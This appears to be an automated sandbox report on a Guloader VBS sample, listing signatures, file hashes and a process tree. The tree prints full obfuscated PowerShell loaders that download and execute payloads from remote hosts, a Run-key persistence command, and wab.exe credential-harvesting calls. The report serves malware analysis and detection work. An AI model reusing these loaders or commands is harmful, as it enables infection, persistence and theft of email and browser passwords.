Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-07-2024 01:03

General

  • Target

    0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs

  • Size

    101KB

  • MD5

    20d1961bd8aa051dfb5632bf9be3e084

  • SHA1

    75aafde8ec0657db8c60570c12620e0b7072f552

  • SHA256

    0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2

  • SHA512

    3a362c2598bdacbb574b2663fac8679a52f84b158e405c2a44581fe45537e05bf09c2d41bb68848d64c419683810c6fa5bb17d8dd04bdc67ab0c4ef53188534f

  • SSDEEP

    3072:p4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvaiIu:Ot7SPReHd0WoT28faa+CS64mu8IQCtv1

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative';If (${host}.CurrentCulture) {$Lejlighedsdigter++;}Function Valgsted($Reprsentationsudgift){$datasikkerheders=$Reprsentationsudgift.Length-$Lejlighedsdigter;$Achter='SUBsTR';$Achter+='ing';For( $Extratellurian=1;$Extratellurian -lt $datasikkerheders;$Extratellurian+=2){$Tunnellen+=$Reprsentationsudgift.$Achter.Invoke( $Extratellurian, $Lejlighedsdigter);}$Tunnellen;}function Differen($Dilettants){ & ($Bookmakernes) ($Dilettants);}$Bliden=Valgsted ' MSoRzmiGl.l a /T5T. 0. u(,W iMn,d.oMwFs PN T 1 0 .B0 ; W.iHnD6.4D;T WxO6N4G;R BrNvP:A1S2 1B.B0 )S GBe cMkAo./F2e0 1,0 0N1A0e1S JFPi rBeYfgoTx /H1A2S1,.,0 ';$Skridtbeskytteren=Valgsted 'PUHsHe r,- A gFeSn tT ';$Coner=Valgsted 'MhSt t.pIs,:G/D/.eSvEo l,u xIcdoFnStha,bTiBlHi dUaLd eA..cio.m .FbFr,/Fr dB/UG.rMeBeBn l,aTn,dA.SxSt p >NhAtntPp s.:r/,/ eSuPrso - f i eLrP-UvDeWc,h i . rFoL/GG,rNe,e n.lFa n dU.UxPtApA ';$Tjenstlig=Valgsted ' >M ';$Bookmakernes=Valgsted 'Bi.e xR ';$Serioese='Baksning';$Lignitize = Valgsted 'Se c h oO P% a pBpFd,a tMa.%I\UPRlSa,nAf u l n,e sPsC.DDvy,kR ,&J&. SeEc.h,o, tR ';Differen (Valgsted 'G$Sg l o,b a l :.RHeTcSa nTcJeRl e.dB=S(Sc mid R/ c. ,$,LNi.gUnMiUtHiDzVet)N ');Differen (Valgsted ' $.g.lHo bRa lC:KF,o.rEfva t.n iBnDgDsst iSlStbaSg =J$KCGoKn.e r .OsRp l,iAtI(.$ST.j eSn,sLtUl.irg.)D ');Differen (Valgsted 'K[ N,e.t,.USGe rLv iHc.eUP oMi,nStAMMaPn,angLe,r,]H:U:.S.ePcsuNrSiAtAy,PPrDoOt o cMoSl =J .[KNLe t . S.e c uTrPi t.ybPPr,o.tFoFc.oPl T y,pFe ]A: : TGlTs 1,2a ');$Coner=$Forfatningstiltag[0];$Pelt241= (Valgsted 'L$TgEl,oRbda,l :,A nFtBoAn eRl,l.e.s.=HNGe w - OMb jGeBc tP RS.y s,t e mG. N e.t.. W.eKb CmlLi e nwt');$Pelt241+=$Recanceled[1];Differen ($Pelt241);Differen (Valgsted 'A$UAUn.tVoPnre l.l,ePsB.KHAe a dIe,r s,[p$ S k.rBiSdAtMb e sQk y t tEegr,eMn ]g=b$ B lPiPd e n ');$Beskydningen=Valgsted ',$ ATn tKoKnre l lIeDsW.lDtoSwFnNl,oPa dAFTiRl.eI(S$,C oDn e.r ,f$HO.s.n a,bEuDrCg.)l ';$Osnaburg=$Recanceled[0];Differen (Valgsted ' $ gGl o bSa l :SA u t oBmRaSt kVa,fHeB=,( T e s t,-,P astFhT l$JO.s,nAaSbSuEr.gC) ');while (!$Automatkafe) {Differen (Valgsted 'A$ g l oObBa,l :TLHo b e l iAe.rDn.e = $ tFrSuDeA ') ;Differen $Beskydningen;Differen (Valgsted ',S tAaFrRt -.S.l,e,e p ,4F ');Differen (Valgsted ' $,g l oTbDa lD: ACuMtuo m a tJk a fKe = ( T eVs.tF-,P aStTh J$ O s n,a,bDusrBgA)H ') ;Differen (Valgsted 'H$BgUlHo b,aRlA:NS.pGaNl.t eFg r uGphp eNn.s,=L$.gElMo bPa.le:CT iAg hFt.rSoTp eDs 6,+I+ % $lFUo rBf.aSt n i,nEgRsPt,iEl.tGaVg . cAo uGnGt ') ;$Coner=$Forfatningstiltag[$Spaltegruppens];}$Akkomoderet=328490;$Soothest=27621;Differen (Valgsted 'C$ g lSoPbDa lB:DRPeAl,i,g.iMo,n i sCt s = DG,eFt -VC,oRn tReRn t. $ O s.nPaBb u r g ');Differen (Valgsted ' $ gCl.o bWa.l :dV e.j tor e rGnGe 1s5D8S ,= ,[,SDyAs,t,e md. CKo,n vHe rKtH] : :SF rto mHBBaQs,e 6T4FSEt r iSnKgH(G$SR e l.i,g i oMn iBsStRsO) ');Differen (Valgsted 'S$ g.lBo bra.l,: CSaAx iUr i, B=D D[ SSyBs t.e m..LT eKx t .AERnBc oSd i,n g ]D: : AMS.CBI I,.UG ePtPSEt r ijnFg ( $ V eFjVt rPe.r n,e.1I5A8C) ');Differen (Valgsted ' $Hg,l,oDbMaMlL: U.nMp r,o.v aLbSl.y =r$TCna,x.igr.iH.Ts uSbOs.tDrMi nSg,( $NAIkCkDoUmAo.dFeDrDeAtS,e$ SUo oRtShCeSs,t )T ');Differen $Unprovably;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3272
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"
        3⤵
          PID:2752
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative';If (${host}.CurrentCulture) {$Lejlighedsdigter++;}Function Valgsted($Reprsentationsudgift){$datasikkerheders=$Reprsentationsudgift.Length-$Lejlighedsdigter;$Achter='SUBsTR';$Achter+='ing';For( $Extratellurian=1;$Extratellurian -lt $datasikkerheders;$Extratellurian+=2){$Tunnellen+=$Reprsentationsudgift.$Achter.Invoke( $Extratellurian, $Lejlighedsdigter);}$Tunnellen;}function Differen($Dilettants){ & ($Bookmakernes) ($Dilettants);}$Bliden=Valgsted ' MSoRzmiGl.l a /T5T. 0. u(,W iMn,d.oMwFs PN T 1 0 .B0 ; W.iHnD6.4D;T WxO6N4G;R BrNvP:A1S2 1B.B0 )S GBe cMkAo./F2e0 1,0 0N1A0e1S JFPi rBeYfgoTx /H1A2S1,.,0 ';$Skridtbeskytteren=Valgsted 'PUHsHe r,- A gFeSn tT ';$Coner=Valgsted 'MhSt t.pIs,:G/D/.eSvEo l,u xIcdoFnStha,bTiBlHi dUaLd eA..cio.m .FbFr,/Fr dB/UG.rMeBeBn l,aTn,dA.SxSt p >NhAtntPp s.:r/,/ eSuPrso - f i eLrP-UvDeWc,h i . rFoL/GG,rNe,e n.lFa n dU.UxPtApA ';$Tjenstlig=Valgsted ' >M ';$Bookmakernes=Valgsted 'Bi.e xR ';$Serioese='Baksning';$Lignitize = Valgsted 'Se c h oO P% a pBpFd,a tMa.%I\UPRlSa,nAf u l n,e sPsC.DDvy,kR ,&J&. SeEc.h,o, tR ';Differen (Valgsted 'G$Sg l o,b a l :.RHeTcSa nTcJeRl e.dB=S(Sc mid R/ c. ,$,LNi.gUnMiUtHiDzVet)N ');Differen (Valgsted ' $.g.lHo bRa lC:KF,o.rEfva t.n iBnDgDsst iSlStbaSg =J$KCGoKn.e r .OsRp l,iAtI(.$ST.j eSn,sLtUl.irg.)D ');Differen (Valgsted 'K[ N,e.t,.USGe rLv iHc.eUP oMi,nStAMMaPn,angLe,r,]H:U:.S.ePcsuNrSiAtAy,PPrDoOt o cMoSl =J .[KNLe t . S.e c uTrPi t.ybPPr,o.tFoFc.oPl T y,pFe ]A: : TGlTs 1,2a ');$Coner=$Forfatningstiltag[0];$Pelt241= (Valgsted 'L$TgEl,oRbda,l :,A nFtBoAn eRl,l.e.s.=HNGe w - OMb jGeBc tP RS.y s,t e mG. N e.t.. W.eKb CmlLi e nwt');$Pelt241+=$Recanceled[1];Differen ($Pelt241);Differen (Valgsted 'A$UAUn.tVoPnre l.l,ePsB.KHAe a dIe,r s,[p$ S k.rBiSdAtMb e sQk y t tEegr,eMn ]g=b$ B lPiPd e n ');$Beskydningen=Valgsted ',$ ATn tKoKnre l lIeDsW.lDtoSwFnNl,oPa dAFTiRl.eI(S$,C oDn e.r ,f$HO.s.n a,bEuDrCg.)l ';$Osnaburg=$Recanceled[0];Differen (Valgsted ' $ gGl o bSa l :SA u t oBmRaSt kVa,fHeB=,( T e s t,-,P astFhT l$JO.s,nAaSbSuEr.gC) ');while (!$Automatkafe) {Differen (Valgsted 'A$ g l oObBa,l :TLHo b e l iAe.rDn.e = $ tFrSuDeA ') ;Differen $Beskydningen;Differen (Valgsted ',S tAaFrRt -.S.l,e,e p ,4F ');Differen (Valgsted ' $,g l oTbDa lD: ACuMtuo m a tJk a fKe = ( T eVs.tF-,P aStTh J$ O s n,a,bDusrBgA)H ') ;Differen (Valgsted 'H$BgUlHo b,aRlA:NS.pGaNl.t eFg r uGphp eNn.s,=L$.gElMo bPa.le:CT iAg hFt.rSoTp eDs 6,+I+ % $lFUo rBf.aSt n i,nEgRsPt,iEl.tGaVg . cAo uGnGt ') ;$Coner=$Forfatningstiltag[$Spaltegruppens];}$Akkomoderet=328490;$Soothest=27621;Differen (Valgsted 'C$ g lSoPbDa lB:DRPeAl,i,g.iMo,n i sCt s = DG,eFt -VC,oRn tReRn t. $ O s.nPaBb u r g ');Differen (Valgsted ' $ gCl.o bWa.l :dV e.j tor e rGnGe 1s5D8S ,= ,[,SDyAs,t,e md. CKo,n vHe rKtH] : :SF rto mHBBaQs,e 6T4FSEt r iSnKgH(G$SR e l.i,g i oMn iBsStRsO) ');Differen (Valgsted 'S$ g.lBo bra.l,: CSaAx iUr i, B=D D[ SSyBs t.e m..LT eKx t .AERnBc oSd i,n g ]D: : AMS.CBI I,.UG ePtPSEt r ijnFg ( $ V eFjVt rPe.r n,e.1I5A8C) ');Differen (Valgsted ' $Hg,l,oDbMaMlL: U.nMp r,o.v aLbSl.y =r$TCna,x.igr.iH.Ts uSbOs.tDrMi nSg,( $NAIkCkDoUmAo.dFeDrDeAtS,e$ SUo oRtShCeSs,t )T ');Differen $Unprovably;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:552
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"
            4⤵
              PID:5108
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Modifies registry class
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4744
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "forvrrende" /t REG_EXPAND_SZ /d "%Diplococci% -w 1 $Phytosaur=(Get-ItemProperty -Path 'HKCU:\Bortslbning\').epidermoid;%Diplococci% ($Phytosaur)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3620
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "forvrrende" /t REG_EXPAND_SZ /d "%Diplococci% -w 1 $Phytosaur=(Get-ItemProperty -Path 'HKCU:\Bortslbning\').epidermoid;%Diplococci% ($Phytosaur)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2240
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uzjxuibktmqxjtpqtthxusrdcomd"
                5⤵
                  PID:1628
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uzjxuibktmqxjtpqtthxusrdcomd"
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3636
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xbohvamdhuiklalucetqffduldwetne"
                  5⤵
                  • Accesses Microsoft Outlook accounts
                  PID:1676
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Forfrelsens.vbs"
                  5⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:832
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                    6⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4052
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                      7⤵
                        PID:2844
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"
                        7⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3860
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
                          8⤵
                            PID:2696
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hvbawtxfvcapvgzyuposikylmjnnmycnnr"
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:448

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

              Filesize

              53KB

              MD5

              d4d8cef58818612769a698c291ca3b37

              SHA1

              54e0a6e0c08723157829cea009ec4fe30bea5c50

              SHA256

              98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

              SHA512

              f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              d4ff23c124ae23955d34ae2a7306099a

              SHA1

              b814e3331a09a27acfcd114d0c8fcb07957940a3

              SHA256

              1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

              SHA512

              f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

            • C:\Users\Admin\AppData\Local\Temp\Forfrelsens.vbs

              Filesize

              26KB

              MD5

              7a6e4c385a470b962384797f26bc0b8a

              SHA1

              5d4eeeef8961f0ca7a83b5baeb36bb6715d61a11

              SHA256

              b13926e222564a63a3308de6cb116c226e93cd1e9d1b5f2fcac2de6d80e70206

              SHA512

              ba326cbba71bbfd6054a1f3564fcf4c085add37c186170e039e9cf469cdd16b0fd394f028d4d09ea45faadeea4cf5f4edb64f8c5db58eb67ed93987740d8e453

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_irxkunvh.yz0.ps1

              Filesize

              60B

              MD5

